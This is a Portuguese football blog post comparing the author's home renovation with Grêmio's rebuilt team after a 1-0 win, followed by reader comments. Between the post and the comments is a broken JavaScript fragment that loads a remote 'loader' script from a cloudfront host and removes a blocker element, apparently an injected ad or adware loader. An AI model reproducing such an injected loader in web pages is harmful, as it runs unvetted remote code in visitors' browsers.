Avalanche Tricolor: Em reforma e feliz

 

Atlético GO 0 x 1 Grêmio
Brasileiro – Serra Dourada GO

 

 

Foram quase cinco meses de reforma na casa em que moro, período no qual ouvi palavras consoladoras de amigos e conhecidos. Houve até quem nos prevenisse para a possibilidade de separação do casal, disseram que o índice de divórcio é enorme devido aos transtornos provocados por marteladas e afins. Nunca soube disso, mas se são os amigos que estão falando, melhor reforçar os votos de confiança feitos há quase 20 anos. Principalmente porque iríamos continuar morando no mesmo ambiente da obra. Ninguém apostou que o projeto estivesse entregue antes de cinco meses, mesmo que eu reforçasse a informação de que minha previsão já tinha a margem de erro, natural quando se pretende, por exemplo, trocar o telhado no verão chuvoso de São Paulo. Entendo a preocupação,

 

Du-vi-de-o-dó !
Isso é coisa lá para o segundo semestre.
Pode colocar mais um mês, com certeza. Eles nunca entregam nada em dia.

 

O “eles”, que aparece na frase acima, uma das muitas que ouvi neste tempo todo (quando as marretadas nas paredes permitiam), são pedreiro, marceneiro, eletricista, pintor, arrematador, telhadista, decorador, gesseiro, calculista, engenheiro e arquiteto – apenas para citar algumas das muitas profissões com as quais convivi nesta primeira metade do ano. É um time completo que precisa estar muito bem afinado, pois um depende do outro, e qualquer tropeço aqui vai atrapalhar logo ali. No meu caso, esta equipe funcionou com perfeição, a ponto de me permitir nessa quarta-feira, estar sentado no sofá da nova sala de televisão, assistindo tranquilamente ao Grêmio vencer seu adversário, no Campeonato Brasileiro.

 

Claro que nosso time ajudou neste clima de tranquilidade, pois apesar de um placar magro, como dizem os locutores de futebol, o desempenho foi interessante para uma equipe que teve de passar por uma reforma com a temporada já iniciada e os campeonatos em curso. Percebe-se que têm peças se encaixando na posição, haja vista a melhora de Marco Antonio no meio de campo, a defesa mais equilibrada, com todos as ressalvas que possamos fazer, e um ataque com o fundamental reforço de Kleber, retornando do estaleiro. Seria injustiça não citar Miralles que fez um gol daqueles que esperamos que o centroavante faça quando a marcação esta dura e o espaço é pequeno. E Fernando, disparado o melhor jogador deste grupo.

 

Longe de mim achar que está tudo pronto, sei que sempre tem alguma coisa a fazer e, no caso do time, precisamos ainda ajustar alguns reforços. Mas você sabe que me entusiasmo muito facilmente com o Grêmio, pois sou incapaz de ver seu desempenho com o olho da razão, deixo que o coração fale por mim sempre (ou quase sempre), por isso fico pensando se não devo agir com o time da mesma forma que meus amigos têm me recomendado em relação a casa, desde que anunciei o fim da reforma. Eles pedem para que eu não festeje antes da hora, pois sempre aparece algum probleminha, um vazamento de cano, um telhado mal colocado, um piso que entorta ou uma pintura que borra.

 

Quer saber !? Por mais que goste de todos eles, vou tapar os ouvidos desta vez e aproveitar o momento. Se não me divertir agora, curtir o prazer da obra feita e dos resultados conquistados pelo time em reforma, vou sorrir quando ? Hoje, tenho o direito de ser feliz.

// -1?’https’:’http’;var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.async=true;ccm.src=http+’://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);jQuery(‘#cblocker’).remove();});};
// ]]>

6 comentários sobre “Avalanche Tricolor: Em reforma e feliz

  1. Mílton,sugiro-te que agradeças aos amigos os conselhos que te deram,mas te cumprimento efusivamente por seres,com relação à reforma da tua casa e ao Grêmio,otimista de carteirinha. Parabéns!Parabéns!Parabéns!

    • E você sabe que bem o que é passar uma reforma. No meu caso, ter uma técnica de qualidade e um time ajustado ajudaram para chegarmos ao resultado que chegamos. Quanto ao Grêmio, esperemos.

  2. Milton, a reforma feita no Kleber superou as expectativas (de mais ou menos também cinco meses para ficar pronto) e aos poucos ele vai retornando e será o centro-avante que o time tanto precisa. Na quarta, depois que ele entrou em campo, gelava a cada lance mais ríspido que ele sofria do adversário. Gelava um pouco do frio que fazia/faz em Foz do Iguaçu e também por temer que ele pudesse sofrer uma nova lesão.

    Tenho que morder minha língua. Não aprovei, no começo, a contratação de Vanderlei Luxemburgo, mas tenho que admitir que o trabalho feito por ele até aqui, permite com que a gente sonhe com algo a mais. E esse algo a mais é a Copa do Brasil.

    Felizmente a equipe está se acertando. Dos jogadores que citou, concordo com todos. Minha única irritação da noite foi com o André Lima, ao perder aquele gol, quando ainda estava 0 a 0. Não é de hoje que ele faz dessas. Tem dias de glória, mas quase sempre são de sofrimento para o torcedor com a atuação dele. Tomara que ele mude. Mas com o retorno de Marcelo Moreno (atuando pela seleção boliviana) e Kleber, acredito que o Lima irá direto pro banco. Como dizem, “para noooosa alegria”, hehe

    Abs

  3. Milton, permita-me usar este espaço para comentar o jogo de hoje contra a Argentina, pois há aspectos gritantes.
    1. Messi é muito superior a qualquer outro jogador. Cristiano Ronaldo e Neymar, embora excepcionais estão anos-luz à distância.
    2. Esta seleção tem tudo para dar certo. Oscar é a estrela e Damião um desastre.
    3. Galvão Bueno disse que Oscar foi criado no Internacional. Uma gafe para ser tirado do ar.

    • Concordo com você. O curioso sobre o Galvão é que o Tino Marcos o corrigiu mas ele decidiu manter o erro no ar. Quanto a Neymar, imagino que terá de jogar muito ainda com estes companheiros para funcionar como no Santos. Lembremos que Messi também demorou para engatar o mesmo futebol do Barcelo na Argentina.

  4. Milton, achei grave a insistência, mas positiva pois mostra que :
    1.Galvão confirma o que se houve nos bastidores. Se considera uma estrela. É só atentarmos com sutileza como dirige o Bem Amigos. Então esta de hoje confirma sem sutileza o “sabichão” que é.
    2. A Globo , inegável qualidade em todos os aspectos, deveria entender que é importante morar no Brasil para falar dos fatos que ocorrem aqui.
    3. Está na hora de atender aqueles recentes cartazes que marcaram presença nos estádios.

Deixe um comentário

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair /  Alterar )

Foto do Google

Você está comentando utilizando sua conta Google. Sair /  Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair /  Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair /  Alterar )

Conectando a %s